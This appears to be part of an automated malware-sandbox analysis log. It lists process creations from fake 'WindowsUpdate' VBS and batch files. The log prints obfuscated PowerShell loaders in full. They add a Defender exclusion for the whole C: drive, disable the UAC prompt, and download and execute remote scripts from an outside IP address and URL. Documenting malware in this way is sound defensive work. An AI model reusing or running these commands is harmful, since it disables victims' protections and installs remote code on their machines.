"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7892 -s 3388
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_801.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 3388
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_87.vbs"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 3336
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_412.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5044 -ip 5044
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
